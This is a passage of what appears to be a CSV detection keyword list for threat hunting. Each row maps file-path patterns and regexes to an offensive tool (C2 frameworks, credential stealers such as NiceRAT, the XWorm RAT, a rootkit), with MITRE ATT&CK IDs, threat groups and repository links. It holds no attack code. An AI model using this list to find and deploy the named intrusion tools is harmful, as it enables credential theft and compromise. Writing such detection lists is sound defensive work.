T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_Any_RunasCs.exe*",".{0,1000}\/net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_portscan.py*",".{0,1000}\/net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/net_recon/*",".{0,1000}\/net_recon\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/net_sniff.*",".{0,1000}\/net_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/net_sniff_*.*",".{0,1000}\/net_sniff_.{0,1000}\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/NETAMSI.ps1*",".{0,1000}\/NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/netbus-auth-bypass.nse*",".{0,1000}\/netbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-brute.nse*",".{0,1000}\/netbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-info.nse*",".{0,1000}\/netbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-version.nse*",".{0,1000}\/netbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NetClone.exe*",".{0,1000}\/NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/NetExec.git*",".{0,1000}\/NetExec\.git.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/netexec.py*",".{0,1000}\/netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/NetExec-main*",".{0,1000}\/NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Net-GPPPassword.git*",".{0,1000}\/Net\-GPPPassword\.git.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*/nethunter-images/*",".{0,1000}\/nethunter\-images\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/netkit.git*",".{0,1000}\/netkit\.git.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/netkit/client/shell.py*",".{0,1000}\/netkit\/client\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/netkit/src/netkit.*",".{0,1000}\/netkit\/src\/netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/NetLoader.git*",".{0,1000}\/NetLoader\.git.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*/netntlm.pl*",".{0,1000}\/netntlm\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/NetNTLMtoSilverTicket*",".{0,1000}\/NetNTLMtoSilverTicket.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/NetshHelperBeacon.git*",".{0,1000}\/NetshHelperBeacon\.git.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*/netsparker.rb*",".{0,1000}\/netsparker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/netstat_windows.go*",".{0,1000}\/netstat_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/nettitude/*",".{0,1000}\/nettitude\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/nettitude/RunOF/*",".{0,1000}\/nettitude\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/NetUser.cpp*",".{0,1000}\/NetUser\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/NetUser.exe*",".{0,1000}\/NetUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/netuserenum/*",".{0,1000}\/netuserenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/network/bloodhound3*",".{0,1000}\/network\/bloodhound3.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Network/PortScan/*",".{0,1000}\/Network\/PortScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/NewPhish.ps1*",".{0,1000}\/NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/nexpose-brute.nse*",".{0,1000}\/nexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-ls.nse*",".{0,1000}\/nfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-showmount.nse*",".{0,1000}\/nfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-statfs.nse*",".{0,1000}\/nfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nginxed-root.sh*",".{0,1000}\/nginxed\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Ngrok-Disk.dll*",".{0,1000}\/Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Ngrok-Install.dll*",".{0,1000}\/Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/NiceRAT.git*",".{0,1000}\/NiceRAT\.git.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/NiceRAT.py*",".{0,1000}\/NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/NiceRAT-1.0.0.zip*",".{0,1000}\/NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/nidem/kerberoast*",".{0,1000}\/nidem\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 